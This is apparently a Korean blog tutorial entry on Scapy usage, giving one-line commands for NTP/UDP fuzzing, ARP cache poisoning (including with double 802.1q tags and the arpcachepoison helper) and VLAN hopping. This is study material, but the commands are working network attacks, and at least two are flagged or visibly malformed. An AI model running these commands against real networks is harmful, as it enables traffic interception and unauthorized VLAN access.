Self-Improvement
Scapy 사용법 7 (간단한 fuzz, ARP cache poisoning, VLAN Hopping) 본문
*예제
>>> send(IP(dst=”192.168.10.1”)/fuzz(UDP()/NTP(version=4)(loop=1)))
일반적인 IP레이어로 퍼지패킷을 작성한 다음 퍼지 UDP 및 NTP 계층을 대상으로 UDP 체크섬이 올바르고 UDP 대상 포트가 NTP에 의해 과부하 되어 123이 되고 NTP 버전이 강제로 버전 4가 되는 것???
※ 오류나서 나중에 다시 알아봐야함.
*예제
>>>send( Ether(dst=clientMAC)/ARP(op=”who-has”, psrc=gateway, pdst=client). inter=RandNum(10,40), loop=1)
=클래식 ARP cache poisoning
>>> send( Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2) /ARP(op="who-has", psrc=gateway, pdst=client), inter=RandNum(10,40), loop=1 )
= ARP cache poisoning with double 802.1q encapsulation
>>>arpcachepoison(target, victim, interval=1)
= 쉽게 사용가능.
*예제
>>> sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=7)/IP(dst="192.168.10.1")/ICMP())
wireshark로 확인.
'scapy' 카테고리의 다른 글
Scapy로 Broadcast 방식의 ARP Spooing 코드 (0) | 2021.06.08 |
---|---|
Scapy로 Wireless 패킷을 만드는 예제 모음 (0) | 2021.06.08 |
Scapy 사용법 6 (패킷 제작) (1) | 2018.10.22 |
Scapy 사용법 5 (sniff) (0) | 2018.10.22 |
Scapy 사용법 4 (ICMP, TCP, UDP ping scan) (0) | 2018.10.22 |